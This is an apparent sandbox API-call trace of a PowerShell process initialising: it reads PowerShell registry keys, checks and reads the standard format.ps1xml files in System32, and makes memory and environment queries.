	[0150.321] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d208 | out: phkResult=0x27d208*=0x330) returned 0x0
	[0150.321] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d18c, lpData=0x0, lpcbData=0x27d188*=0x0 | out: lpType=0x27d18c*=0x1, lpData=0x0, lpcbData=0x27d188*=0x56) returned 0x0
	[0150.322] CoTaskMemAlloc (cb=0x5a) returned 0x19b740
	[0150.322] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d15c, lpData=0x19b740, lpcbData=0x27d158*=0x56 | out: lpType=0x27d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d158*=0x56) returned 0x0
	[0150.322] CoTaskMemFree (pv=0x19b740) 
	[0150.322] RegCloseKey (hKey=0x330) returned 0x0
	[0150.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0150.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x27cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0154.532] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.899] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.901] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.902] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.902] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.903] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.904] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.907] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.517] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.528] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.529] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.066] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.067] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.069] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.075] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0159.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.075] CoTaskMemFree (pv=0x190070) 
	[0159.801] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d3a8 | out: phkResult=0x27d3a8*=0x1d0) returned 0x0
	[0159.801] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x27d3bc, lpData=0x0, lpcbData=0x27d3b8*=0x0 | out: lpType=0x27d3bc*=0x1, lpData=0x0, lpcbData=0x27d3b8*=0x74) returned 0x0
	[0159.801] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x27d32c, lpData=0x0, lpcbData=0x27d328*=0x0 | out: lpType=0x27d32c*=0x1, lpData=0x0, lpcbData=0x27d328*=0x74) returned 0x0
	[0159.801] CoTaskMemAlloc (cb=0x78) returned 0x1b8409b0
	[0159.801] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x27d2fc, lpData=0x1b8409b0, lpcbData=0x27d2f8*=0x74 | out: lpType=0x27d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x27d2f8*=0x74) returned 0x0
	[0159.801] CoTaskMemFree (pv=0x1b8409b0) 
	[0159.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0159.801] SetErrorMode (uMode=0x1) returned 0x1
	[0159.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0159.874] SetErrorMode (uMode=0x1) returned 0x1
	[0159.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.875] SetErrorMode (uMode=0x1) returned 0x1
	[0159.875] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.160] SetErrorMode (uMode=0x1) returned 0x1
	[0160.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.161] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0160.162] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.162] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0160.162] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0160.162] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0160.162] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0160.162] SetErrorMode (uMode=0x1) returned 0x1
	[0160.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0160.163] SetErrorMode (uMode=0x1) returned 0x1
	[0160.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0160.163] SetErrorMode (uMode=0x1) returned 0x1
	[0160.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d280 | out: lpFileInformation=0x27d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0160.163] SetErrorMode (uMode=0x1) returned 0x1
	[0160.164] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0160.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.164] CoTaskMemFree (pv=0x190070) 
	[0160.179] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0160.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.179] CoTaskMemFree (pv=0x190070) 
	[0160.180] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0160.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.180] CoTaskMemFree (pv=0x190070) 
	[0160.182] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0160.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.182] CoTaskMemFree (pv=0x190070) 
	[0160.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.183] SetErrorMode (uMode=0x1) returned 0x1
	[0160.198] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0160.199] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0160.204] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0160.205] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0160.209] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0160.211] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.215] ReadFile (in: hFile=0x1cc, lpBuffer=0x342e9da, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342e9da*, lpNumberOfBytesRead=0x27cf18*=0x0, lpOverlapped=0x0) returned 1
	[0160.217] ReadFile (in: hFile=0x1cc, lpBuffer=0x342f490, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x342f490*, lpNumberOfBytesRead=0x27cf18*=0x0, lpOverlapped=0x0) returned 1
	[0160.223] CloseHandle (hObject=0x1cc) returned 1
	[0160.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.438] SetErrorMode (uMode=0x1) returned 0x1
	[0160.438] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27cec0 | out: lpFileInformation=0x27cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.812] SetErrorMode (uMode=0x1) returned 0x1
	[0160.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.812] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27cfa8 | out: phkResult=0x27cfa8*=0x1cc) returned 0x0
	[0160.812] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf2c, lpData=0x0, lpcbData=0x27cf28*=0x0 | out: lpType=0x27cf2c*=0x1, lpData=0x0, lpcbData=0x27cf28*=0x56) returned 0x0
	[0160.812] CoTaskMemAlloc (cb=0x5a) returned 0x19bf20
	[0160.812] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cefc, lpData=0x19bf20, lpcbData=0x27cef8*=0x56 | out: lpType=0x27cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cef8*=0x56) returned 0x0
	[0160.812] CoTaskMemFree (pv=0x19bf20) 
	[0160.813] RegCloseKey (hKey=0x1cc) returned 0x0
	[0160.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.820] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x6c7b2667, Data2=0xff1f, Data3=0x4490, Data4=([0]=0x9e, [1]=0x37, [2]=0x4d, [3]=0x81, [4]=0x27, [5]=0x8f, [6]=0x12, [7]=0xf2))) returned 0x0
	[0160.841] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x1ae6d154, Data2=0x9195, Data3=0x42cd, Data4=([0]=0x99, [1]=0xa2, [2]=0x69, [3]=0xf4, [4]=0x7d, [5]=0xcd, [6]=0x37, [7]=0x63))) returned 0x0
	[0160.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.843] SetErrorMode (uMode=0x1) returned 0x1
	[0160.843] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0161.027] GetFileType (hFile=0x1cc) returned 0x1
	[0161.027] SetErrorMode (uMode=0x1) returned 0x1
	[0161.027] GetFileType (hFile=0x1cc) returned 0x1
	[0161.027] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0161.077] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
